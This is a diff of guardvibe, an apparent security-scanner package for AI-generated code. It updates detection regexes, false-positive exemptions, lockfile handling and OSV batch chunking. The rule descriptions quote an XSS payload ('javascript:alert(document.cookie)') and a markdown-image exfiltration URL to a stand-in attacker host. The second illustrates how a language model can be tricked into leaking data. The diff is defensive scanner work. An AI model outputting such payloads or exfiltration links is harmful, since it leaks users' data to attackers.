guardvibe 3.0.52 → 3.0.54

package/build/data/rules/advanced-security.js

@@ -304,7 +304,7 @@ export const advancedSecurityRules = [
         severity: "medium",
         owasp: "A04:2025 Insecure Design",
         description: "Regular expression contains nested quantifiers ((a+)+), overlapping alternation with quantifiers (([a-z]+)*), or other patterns that cause catastrophic backtracking. Attackers can send crafted input to freeze the event loop.",
-        pattern: /\/(?:[^/\\\n]|\\.)*(?:\([^)\n]*[+*][^)\n]*\)\s*[+*]|\(\?:[^)\n]*[+*][^)\n]*\)\s*[+*])(?:[^/\\\n]|\\.)*\//g,
+        pattern: /\/(?:[^/\\\n]|\\.)*(?:\([^)\n]*[+*][^)\n]*\)[+*]|\(\?:[^)\n]*[+*][^)\n]*\)[+*])(?:[^/\\\n]|\\.)*\//g,
         languages: ["javascript", "typescript"],
         fix: "Rewrite the regex to avoid nested quantifiers. Use atomic groups or possessive quantifiers if available, or use the 'safe-regex' library to validate patterns.",
         fixCode: '// BAD: catastrophic backtracking\nconst re = /(a+)+$/;\n\n// GOOD: no nested quantifiers\nconst re = /a+$/;\n\n// GOOD: validate with safe-regex\nimport safe from "safe-regex";\nif (!safe(pattern)) throw new Error("Unsafe regex");',
@@ -395,7 +395,7 @@ export const advancedSecurityRules = [
         severity: "medium",
         owasp: "A07:2025 Cross-Site Scripting",
         description: "User-provided URL is used directly in an href attribute without checking for dangerous protocols. Attackers can inject javascript:alert(document.cookie) to execute XSS when the link is clicked.",
-        pattern: /href\s*=\s*\{(?:user|profile|author|post|comment|data|item|record)[\w.]*\.(?:url|website|link|href|homepage)\}/gi,
+        pattern: /href\s*=\s*\{(?:user|profile|author|post|comment|record|input|formData|payload)[\w.]*\.(?:url|website|link|href|homepage)\}/gi,
         languages: ["javascript", "typescript"],
         fix: "Validate that URLs start with https:// or http:// before using in href.",
         fixCode: '// BAD: XSS via javascript: protocol\n<a href={user.website}>{user.name}</a>\n\n// GOOD: protocol validation\nfunction safeHref(url: string): string {\n  try {\n    const parsed = new URL(url);\n    if (["http:", "https:"].includes(parsed.protocol)) return url;\n  } catch {}\n  return "#";\n}\n<a href={safeHref(user.website)}>{user.name}</a>',

package/build/data/rules/ai-security.js

@@ -189,7 +189,7 @@ export const aiSecurityRules = [
         severity: "high",
         owasp: "A02:2025 Injection",
         description: "LLM output containing markdown images is rendered without URL validation. Attackers can trick the model into outputting ![img](https://attacker.com/exfil?data=SENSITIVE_DATA) — the browser automatically fetches the URL, silently exfiltrating data. This was exploited against Microsoft 365 Copilot in 2025.",
-        pattern: /(?:dangerouslySetInnerHTML|innerHTML|v-html|marked|remark|rehype|unified|react-markdown)[\s\S]{0,300}?(?:message\.content|completion|output|response|aiResponse|result\.text)/gi,
+        pattern: /(?:dangerouslySetInnerHTML|innerHTML|v-html|<ReactMarkdown\b)[\s\S]{0,300}?(?:message\.content|completion|aiResponse|chatResponse|llmResponse|result\.text|generated_text|gpt[A-Z_]\w*|claude[A-Z_]\w*|openai\.\w+\.create)/g,
         languages: ["javascript", "typescript"],
         fix: "Sanitize LLM output before rendering as markdown. Strip or validate image URLs against an allowlist.",
         fixCode: '// Sanitize AI output before rendering markdown\nfunction sanitizeAIOutput(text: string): string {\n  // Remove markdown images with external URLs\n  return text.replace(/!\\[([^\\]]*)\\]\\(https?:\\/\\/[^)]+\\)/g, "[$1](link removed)");\n}\n\n// Or use a markdown renderer with image URL allowlist\n<ReactMarkdown\n  components={{\n    img: ({ src }) => ALLOWED_HOSTS.some(h => src?.startsWith(h)) ? <img src={src} /> : null\n  }}\n>{sanitizeAIOutput(aiResponse)}</ReactMarkdown>',

package/build/tools/check-code.js

@@ -225,6 +225,7 @@ const LEGITIMATE_PREFIXED_PACKAGES = new Set([
     "fast-glob", "fast-deep-equal", "fast-json-stable-stringify", "fast-json-stringify",
     "fast-xml-parser", "fast-diff", "fast-levenshtein", "fast-redact", "fast-check",
     "fast-uri", "fast-querystring", "fast-decode-uri-component", "fast-content-type-parse",
+    "fast-equals", "fast-fifo", "fast-shallow-equal", "fast-safe-stringify",
     "safe-array-concat", "safe-stable-stringify", "safe-buffer", "safe-regex",
     "safe-regex-test", "safe-push-apply",
     "simple-git", "simple-update-notifier", "simple-swizzle", "simple-concat",
@@ -404,6 +405,11 @@ export function analyzeCode(code, language, framework, filePath, configDir, rule
         // do expose data still get flagged.
         if (rule.id === "VG1006" && isBatchScriptFile)
             continue;
+        // Skip VG1008 (Admin Role Elevation Without Authorization Check) in batch scripts —
+        // CLI scripts under scripts/ run by the operator at the terminal; there is no HTTP
+        // request handler to authorize. Rule still fires inside route handlers and Server Actions.
+        if (rule.id === "VG1008" && isBatchScriptFile)
+            continue;
         // Skip VG132 (Missing Request Body Size Limit) on Next.js route handlers and
         // pages/api endpoints — Next.js/Vercel apply a default 4.5MB body limit at the
         // platform layer, which is what the rule is checking for.
@@ -630,18 +636,20 @@ export function analyzeCode(code, language, framework, filePath, configDir, rule
             }
             // VG020 (wildcard dep version) on package.json: skip the `engines` block —
             // `"node": ">=18.0.0"` is a runtime constraint, not a dependency range.
+            // Also skip the `overrides` block — that's npm's mechanism for *forcing* a
+            // minimum transitive version (security tightening), not a loose dep range.
             if (rule.id === "VG020" && filePath && /package\.json$/.test(filePath)) {
-                let inEngines = false;
+                let inExemptBlock = false;
                 for (let j = lineNumber - 1; j >= Math.max(0, lineNumber - 6); j--) {
                     const prev = lines[j] ?? "";
-                    if (/"engines"\s*:\s*\{/.test(prev)) {
-                        inEngines = true;
+                    if (/"(?:engines|overrides|resolutions|pnpm)"\s*:\s*\{/.test(prev)) {
+                        inExemptBlock = true;
                         break;
                     }
                     if (/^\s*\}/.test(prev))
-                        break; // closed a previous block — not in engines
+                        break; // closed a previous block — not in exempt
                 }
-                if (inEngines)
+                if (inExemptBlock)
                     continue;
             }
             // Skip hardcoded-credential rules when the value is a human-readable sentence
@@ -670,6 +678,37 @@ export function analyzeCode(code, language, framework, filePath, configDir, rule
                 if (/\b[A-Z][A-Z0-9_]*\s*=\s*["']\d+["']/.test(matchedLine))
                     continue;
             }
+            // VG106 (Timing-Unsafe Secret Comparison): skip when one operand is a React useRef
+            // pattern (`*Ref.current`). Refs hold local component state, not user-provided input,
+            // so timing attacks don't apply — there's no remote attacker controlling the comparand.
+            if (rule.id === "VG106") {
+                const matchedLine = lines[lineNumber - 1] ?? "";
+                if (/\b\w*Ref\.current\b/.test(matchedLine))
+                    continue;
+            }
+            // VG126 (Dynamic RegExp from User Input): skip when the variable name signals it has
+            // already been escaped/sanitized (e.g. `escapedElement`, `safeQuery`, `sanitizedInput`).
+            if (rule.id === "VG126") {
+                const matchedLine = lines[lineNumber - 1] ?? "";
+                if (/\bnew\s+RegExp\s*\(\s*(?:escaped|escape\w*|sanitized|sanitiz\w*|safe[A-Z_]\w*|validated)\w*\b/.test(matchedLine))
+                    continue;
+            }
+            // VG1009 (Supabase ilike/like Pattern Injection): skip when the interpolated variable
+            // name signals it has already been escaped (e.g. `escaped`, `safeQuery`, `sanitized`).
+            if (rule.id === "VG1009") {
+                const matchedLine = lines[lineNumber - 1] ?? "";
+                if (/\$\{\s*(?:escaped|escape\w*|sanitized|sanitiz\w*|safe[A-Z_]\w*|validated)/.test(matchedLine))
+                    continue;
+            }
+            // VG426 (Missing Role Check on Admin Route): skip when the matched line is inside a
+            // JSDoc comment (`* GET /api/admin/...`) — the actual handler code below the doc block
+            // gets evaluated separately. Without this, every documented admin route fires twice
+            // (once on the doc-comment line, once on the handler).
+            if (rule.id === "VG426") {
+                const matchedLine = lines[lineNumber - 1] ?? "";
+                if (/^\s*\*\s/.test(matchedLine) || /^\s*\/\*\*/.test(matchedLine) || /^\s*\*\//.test(matchedLine))
+                    continue;
+            }
             // Skip VG010 (SQL injection) on Angular HTTP service calls — http.get/post/etc.
             // are HTTP client methods, not SQL. The existing pattern's `get` keyword catches them.
             if (rule.id === "VG010") {

package/build/tools/full-audit.js

@@ -223,11 +223,30 @@ export async function runFullAudit(path, options) {
     }
     // --- Section 3: Dependencies ---
     if (!options?.skipDeps) {
-        const manifestPath = resolve(projectRoot, "package.json");
+        // Prefer lockfiles for resolved (installed) versions over package.json spec ranges.
+        // package.json says `"@clerk/nextjs": "^7.0.1"` but the installed version may be 7.2.8.
+        // OSV needs the resolved version to give accurate vuln matches; spec lower bound
+        // produces false positives where the bug was already patched in a higher minor.
+        const lockCandidates = ["package-lock.json", "npm-shrinkwrap.json", "yarn.lock", "pnpm-lock.yaml"];
+        let manifestPath = resolve(projectRoot, "package.json");
+        for (const lock of lockCandidates) {
+            const lockPath = resolve(projectRoot, lock);
+            if (existsSync(lockPath)) {
+                manifestPath = lockPath;
+                break;
+            }
+        }
         if (existsSync(manifestPath)) {
             try {
                 const depsJson = await scanDependencies(manifestPath, "json");
                 const parsed = safeJsonParse(depsJson);
+                if (!parsed) {
+                    // scanDependencies returned a markdown error (OSV API unreachable, parse failed, etc).
+                    // Push a dependencies section so downstream consumers always see it; surface the
+                    // error in `details` so users can troubleshoot instead of silently missing the section.
+                    const errSnippet = (depsJson.match(/Error:[^\n]+/) || ["Scan failed"])[0];
+                    sections.push({ name: "dependencies", status: "error", findings: 0, critical: 0, high: 0, medium: 0, details: errSnippet });
+                }
                 if (parsed) {
                     const vulnPackages = parsed.summary?.vulnerable ?? 0;
                     const depFindings = [];

package/build/utils/osv-client.js

@@ -15,47 +15,51 @@ export async function queryOsv(name, version, ecosystem) {
     return data.vulns ?? [];
 }
 export async function queryOsvBatch(packages) {
-    const queries = packages.map(pkg => ({
-        package: { name: pkg.name, ecosystem: pkg.ecosystem },
-        version: pkg.version,
-    }));
-    const response = await fetch("https://api.osv.dev/v1/querybatch", {
-        method: "POST",
-        headers: { "Content-Type": "application/json" },
-        body: JSON.stringify({ queries }),
-        signal: AbortSignal.timeout(10000),
-    });
     const results = new Map();
-    if (!response.ok) {
-        throw new Error(`OSV batch API error: ${response.status} ${response.statusText}`);
-    }
-    const data = await response.json();
-    // Batch API returns minimal vuln info (just id). Fetch full details for each.
-    for (let i = 0; i < packages.length; i++) {
-        const key = `${packages[i].name}@${packages[i].version}`;
-        const batchVulns = data.results[i]?.vulns || [];
-        if (batchVulns.length === 0) {
-            results.set(key, []);
-            continue;
+    // OSV batch can time out on large monorepo lockfiles (1000+ packages),
+    // and very-large requests can be rate-limited. Chunk into 500-pkg batches
+    // and process sequentially so the per-request timeout is generous.
+    const CHUNK_SIZE = 500;
+    for (let start = 0; start < packages.length; start += CHUNK_SIZE) {
+        const chunk = packages.slice(start, start + CHUNK_SIZE);
+        const queries = chunk.map(pkg => ({
+            package: { name: pkg.name, ecosystem: pkg.ecosystem },
+            version: pkg.version,
+        }));
+        const response = await fetch("https://api.osv.dev/v1/querybatch", {
+            method: "POST",
+            headers: { "Content-Type": "application/json" },
+            body: JSON.stringify({ queries }),
+            signal: AbortSignal.timeout(60000),
+        });
+        if (!response.ok) {
+            throw new Error(`OSV batch API error: ${response.status} ${response.statusText}`);
         }
-        // Fetch full vulnerability details by ID
-        const fullVulns = [];
-        for (const bv of batchVulns) {
-            try {
-                const vulnResponse = await fetch(`https://api.osv.dev/v1/vulns/${bv.id}`, {
-                    signal: AbortSignal.timeout(5000),
-                });
-                if (vulnResponse.ok) {
-                    const vulnData = await vulnResponse.json();
-                    fullVulns.push(vulnData);
-                }
+        const data = await response.json();
+        for (let i = 0; i < chunk.length; i++) {
+            const key = `${chunk[i].name}@${chunk[i].version}`;
+            const batchVulns = data.results[i]?.vulns || [];
+            if (batchVulns.length === 0) {
+                results.set(key, []);
+                continue;
             }
-            catch {
-                // If individual fetch fails, use minimal info
-                fullVulns.push({ id: bv.id, summary: "Details unavailable" });
+            const fullVulns = [];
+            for (const bv of batchVulns) {
+                try {
+                    const vulnResponse = await fetch(`https://api.osv.dev/v1/vulns/${bv.id}`, {
+                        signal: AbortSignal.timeout(5000),
+                    });
+                    if (vulnResponse.ok) {
+                        const vulnData = await vulnResponse.json();
+                        fullVulns.push(vulnData);
+                    }
+                }
+                catch {
+                    fullVulns.push({ id: bv.id, summary: "Details unavailable" });
+                }
             }
+            results.set(key, fullVulns);
         }
-        results.set(key, fullVulns);
     }
     return results;
 }

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "guardvibe",
-  "version": "3.0.52",
+  "version": "3.0.54",
   "mcpName": "io.github.goklab/guardvibe",
   "description": "Security MCP for vibe coding. 365 rules, 36 tools, CLI + doctor. Host security, auth coverage mapping, LLM-powered deep scan (IDOR/business logic), taint analysis. Plus Next.js, Supabase, Clerk, Stripe, Prisma, tRPC, Hono, GraphQL, Convex, Turso, Uploadthing, AI SDK, and the full AI-generated stack.",
   "type": "module",